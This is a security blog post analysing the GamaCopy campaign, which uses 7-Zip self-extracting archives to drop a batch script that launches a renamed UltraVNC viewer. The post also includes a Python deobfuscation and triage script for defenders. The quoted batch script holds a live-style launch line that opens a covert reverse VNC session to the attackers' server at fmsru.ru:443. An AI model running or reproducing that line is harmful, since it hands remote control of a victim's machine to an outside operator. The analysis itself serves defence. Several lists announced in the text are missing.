Hoplon InfoSec
27 Jan, 2025
Cybersecurity researchers have uncovered a sophisticated malware campaign that infiltrates Russian-speaking organizations using 7-Zip self-extracting archives and the UltraVNC remote access tool. This campaign, attributed to a threat actor called GamaCopy, mimics the tactics previously associated with the Kremlin-aligned Gamaredon group, highlighting its advanced and targeted nature.
In this blog, we’ll delve into the attack chain, analyze the infrastructure the threat actors use, and discuss protective measures organizations can take to mitigate this threat.
The GamaCopy malware campaign begins with a carefully designed spear-phishing attack, an approach commonly used to target specific individuals or entities. The spear-phishing email contains a malicious self-extracting (SFX) archive created with 7-Zip. This archive serves as the initial payload and is designed to bypass standard security measures, ensuring the subsequent delivery of the malware’s core components.
Once the victim executes the SFX archive, it unpacks a batch script that performs several critical actions:
The attackers successfully infiltrate the targeted system by employing these steps while maintaining a covert presence.
The batch script used in the campaign employs various obfuscation techniques to hide its intentions and hinder analysis. Below is an example of the script:
@echo off
rem Enable !var! expansion (the original listing's "set local" is a typo for setlocal)
setlocal enabledelayedexpansion
rem Random-looking variable names hold the victim host name, the session tag and the tool name split into fragments
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC
rem Launch the renamed UltraVNC viewer from %TEMP% as a reverse connection to the C2 on the HTTPS port, tagged with the host name
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443
The tactics employed by GamaCopy closely resemble those of the Gamaredon group (also known as Core Werewolf, Awaken Likho, and PseudoGamaredon). These similarities include:
These overlapping tactics suggest that GamaCopy has either drawn inspiration from Gamaredon or is a direct offshoot of the group.
The GamaCopy campaign poses a significant threat to Russian-speaking organizations, particularly those in the defense, government, and critical infrastructure sectors. The use of military-themed decoy documents indicates a focus on espionage and data exfiltration, aiming to gather sensitive information that could be used for strategic purposes.
Additionally, the sophistication of the campaign, combined with the use of legitimate tools like UltraVNC, makes it challenging to detect and mitigate.
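The two points above (the fragment-variable obfuscation in the batch script, and the difficulty of telling a legitimate UltraVNC session from this reverse-connection use) can be worked through with a small static triage script. The following Python is an added example written for this post, not code from the report or from any of the researchers it cites. It resolves %var% and !var! references the way cmd.exe would, so split strings such as "Ultr" + "aVNC" are glued back together, then parses the resolved launch line for UltraVNC viewer arguments and scores the traits that separate an implant from ordinary admin use. The indicators (OneDrivers.exe, fmsru.ru:443, the _SVOD_4797 tag) are the ones printed above; the COMPUTERNAME and TEMP values are constructed stand-ins for the victim environment, and the scoring rules are the author's assumptions. The deobfuscator is general: it handles any script that builds strings from set fragments, not only this sample.

```python
"""Static triage of an obfuscated batch dropper that launches a VNC viewer."""
import re
from typing import Dict, List, Optional

# The script as printed in the report (with the setlocal typo corrected); OneDrivers.exe,
# fmsru.ru:443 and the _SVOD_4797 suffix are the page's indicators, nothing else is assumed.
SAMPLE_BATCH = r"""@echo off
setlocal enabledelayedexpansion
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443
"""

# Constructed values standing in for the victim environment during offline analysis.
ANALYSIS_ENV = {"COMPUTERNAME": "WS-ANALYST", "TEMP": r"C:\Users\analyst\AppData\Local\Temp"}

SET_RE = re.compile(r'^set\s+("?)([^=\s"]+)=(.*?)\1$', re.IGNORECASE)
VAR_RE = re.compile(r'[%!]([^%!\s]+)[%!]')


def expand(text: str, env: Dict[str, str]) -> str:
    """Resolve %name% and !name! references case-insensitively, as cmd.exe does;
    unknown names are left in place so the analyst can see what is unresolved."""
    table = {k.lower(): v for k, v in env.items()}
    return VAR_RE.sub(lambda m: table.get(m.group(1).lower(), m.group(0)), text)


def deobfuscate_batch(script: str, base_env: Dict[str, str]) -> List[str]:
    """Single pass over the script: record every `set name=value` (the value is expanded
    at assignment, so fragments are glued together when referenced later) and return
    the remaining commands with all variables resolved."""
    env = dict(base_env)
    commands: List[str] = []
    for raw in script.splitlines():
        line = raw.strip().lstrip("@")
        if not line or line.startswith("::"):
            continue
        verb = line.split(None, 1)[0].lower()
        if verb in ("rem", "setlocal", "endlocal") or line.lower() in ("echo off", "echo on"):
            continue
        m = SET_RE.match(line)
        if m:
            env[m.group(2)] = expand(m.group(3), env)
            continue
        commands.append(expand(line, env))
    return commands


def extract_vnc_indicators(command: str) -> Optional[Dict[str, str]]:
    """Pull UltraVNC-viewer style arguments (-connect host:port, -id:tag, -autoreconnect)
    out of a resolved launch line. Tokens are split on whitespace, so a path with spaces
    would need quote-aware splitting. Returns None when there is no -connect target."""
    tokens = command.split()
    exe = next((t for t in tokens if t.lower().endswith(".exe")), "")
    info = {"executable": exe, "autoreconnect": "false", "id": "", "host": "", "port": ""}
    i = 0
    while i < len(tokens):
        low = tokens[i].lower()
        if low == "-autoreconnect":
            info["autoreconnect"] = "true"
        elif low.startswith("-id:"):
            info["id"] = tokens[i][len("-id:"):]
        elif low.startswith("-connect"):
            target = tokens[i][len("-connect"):].lstrip(":")
            if not target and i + 1 < len(tokens):  # value given as the next token
                i += 1
                target = tokens[i]
            host, _, port = target.rpartition(":")
            info["host"] = (host or target).rstrip(":")
            info["port"] = port if host else "5900"  # 5900 is the VNC default port
        i += 1
    return info if info["host"] else None


def assess_script(script: str, env: Dict[str, str] = ANALYSIS_ENV) -> Dict[str, object]:
    """Resolve the script, then score each VNC launch on traits that distinguish a covert
    reverse-VNC implant from routine remote administration (scoring rules are assumptions)."""
    commands = deobfuscate_batch(script, env)
    findings = []
    host_name = env.get("COMPUTERNAME", "")
    for cmd in commands:
        ind = extract_vnc_indicators(cmd)
        if ind is None:
            continue
        reasons = []
        if ind["autoreconnect"] == "true":
            reasons.append("reverse connection that re-dials the operator (-autoreconnect)")
        if "\\temp\\" in ind["executable"].lower():
            reasons.append("viewer binary staged in a temp directory")
        if ind["port"] in ("443", "80"):
            reasons.append("control channel on a web port to blend with normal egress")
        if host_name and host_name.lower() in ind["id"].lower():
            reasons.append("victim host name embedded in the session id")
        findings.append({"command": cmd, "indicators": ind, "reasons": reasons,
                         "verdict": "suspicious" if len(reasons) >= 2 else "review"})
    return {"resolved_commands": commands, "findings": findings}


if __name__ == "__main__":
    for finding in assess_script(SAMPLE_BATCH)["findings"]:
        print(finding["verdict"], finding["indicators"]["host"], finding["reasons"])
```

The same resolved-command output is what to feed a process-creation rule: the -connect target and -id tag survive the obfuscation unchanged, which is why matching on the launched command line (rather than on the variable names, which change per sample) is the more durable detection.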
Organizations should adopt a multi-layered cybersecurity approach to protect against the GamaCopy malware campaign and similar threats. Below are some key measures to consider:
The GamaCopy malware campaign underscores the evolving nature of cyber threats and the importance of proactive defense measures. By leveraging spear-phishing emails, obfuscated scripts, and legitimate remote access tools, the threat actors behind GamaCopy have demonstrated their ability to bypass traditional security measures and target high-value organizations.
Organizations, particularly those in sensitive sectors, must remain vigilant and adopt comprehensive cybersecurity practices to mitigate the risks of advanced threat campaigns. By combining robust technology with employee awareness, businesses can strengthen their defenses and minimize the impact of sophisticated attacks like GamaCopy.
For more:
https://cybersecuritynews.com/new-malware-campaign-using-7z-ultravnc-tool/